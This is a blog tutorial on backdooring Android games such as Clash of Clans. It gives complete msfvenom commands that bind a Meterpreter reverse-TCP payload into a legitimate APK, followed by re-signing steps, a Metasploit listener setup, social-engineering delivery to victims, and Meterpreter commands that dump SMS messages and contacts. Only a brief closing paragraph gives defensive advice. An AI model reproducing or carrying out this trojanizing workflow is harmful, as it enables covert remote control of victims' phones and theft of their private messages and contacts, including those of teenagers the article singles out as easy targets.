How Cyber Criminals are Backdooring games like Clash of Clans and PUBG


Introduction
Android device hacking via a malicious app has been something there in the wild for a long time. We all know installing any app from unknown sources will land your device remotely in the hands of a cybercriminal.

In this article, we will demonstrate how cybercriminals attach malware with popular apps. So if you are thinking that paying on play store for any paid app is not worth it then this article is totally worth reading for you. Let's also keep in mind that most of these games are played by teenagers who may not care what permissions they are giving to these apps and what will be the consequences they will have to deal with, especially if they are using their parent's phone :P

Here we will use MSFvenom for generating payload and binding with an existing application, and setup listener to the metasploit framework. Once user/victim downloads and install the real-world application then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk/application on victim mobile.

Introduction to MSFvenom
MSFvenom is a mixture of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. It standardizes the command line options, speeds things up a bit by using a single framework and can able to handle all possible output formats. In this, MSFvenom used to make a payload and bind with an existing real-world application to penetrate the android device.

Proof of Concept: Target App: Clash of Clans

We need to bind the payload with the apk of Clash of Clans.

Terminal - .\msfvenom.bat -x ‘Clash of Clans_com.supercell.clashofclans.apk’ -p android/
meterpreter/reverse_tcp lhost=192.168.43.86 lport=2222 -o coc.apk

-x = specify custom executable file to use as a template
-p = payload to use
lhost = Local host where you need to get session after payload execute
lport = Local port where you want the session
-o = save the payload to a file

Let’s talk about what msfvenom is doing in the backend!
  • Generating the payload(android/meterpreter/reverse_tcp) i.e the malicious application.
  • It decompiles the payload and the COC apk.
    • For decompiling, it uses apktool.


  • After decompiling, it copies the payload files to the Clash of Clans apk.
  • Inject the hook into the appropriate activity of the COC apk such that our payload will run.
    • It places the hook so that when the app is launched, it will also launch the payload with it, for that it chooses the AndroidManifest.xml file of the application. And then it looks for a <activity> tag which contains both the lines –
    • <action android:name="android.intent.action.MAIN"/>
    • <category android:name="android.intent.category.LAUNCHER"/>
    • And then inject the payload.


  • Write permissions in the AndroidManifest.xml file.


  • Re-compile the original apk
    • Using apktool
  • The signing of the apk


Methods for making the certificate, private key.
  • Using the Android Studio.
  • Msfvenom do this directly while binding the payload in the existing application using jarsigner directly - 
    • jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA apk_path androiddebugkey

Here I’m adding the certificate and private key which is made by android studio. Add the certificate.pem, key.pk8, and compile with signup.jar

Android wants all apps to be digitally signed with a certificate before they will be put into the device. Android uses that certificate to spot the author of an app, and the certificate does not need to be signed by a certificate authority. Android apps often use self-signed certificates.
The app developer holds the certificate's private key.
Terminal: java -jar signapk.jar certificate.pem key.pk8 output.apk coc.apk
Setup msfconsole for listening:

Terminal: msfconsole
And launch the exploit/multi/handler and use the android payload to listen to the clients.

Terminal: set payload android/meterpreter/reverse_tcp
Then set the required options, listening to host i.e. lhost=192.168.43.86 and listening port i.e. lport=2222, same as the lhost and lport set while the payload generation.
And we run the exploit and wait for the victim to install and run the application.
Now send the application named coc.apk to the victim’s device.

Back to the attacker’s machine, As we already started the multi/handler exploit to listen on port 2222 and IP 192.168.43.86 . We got the meterpreter of the android device.
And there are lots of commands available in meterpreter by using “?” help command to see more options for what we can perform with an Android device.

If we want to get all the SMS stored in the victim’s machine use dump_sms.

If we want to get all the contacts which are in the victim’s machine use dump_contacts.

We have tried the same process on below applications and we got 95% success when it comes to successful backdooring.
CandyCrush
LudoKing
PhotoGrid


Soon we will release the same demonstration with PUBG so keep in touch :) Make sure from today onwards you say NO to apps out side play store which is the first defence against malwares but as indicated in recent reports even apps on play store have been found having backdoors, so be carefull while downloading and using apps, make sure you read comments, check the total downloads before downloading apps to ensure what people are saying about the application.

Post a Comment

0 Comments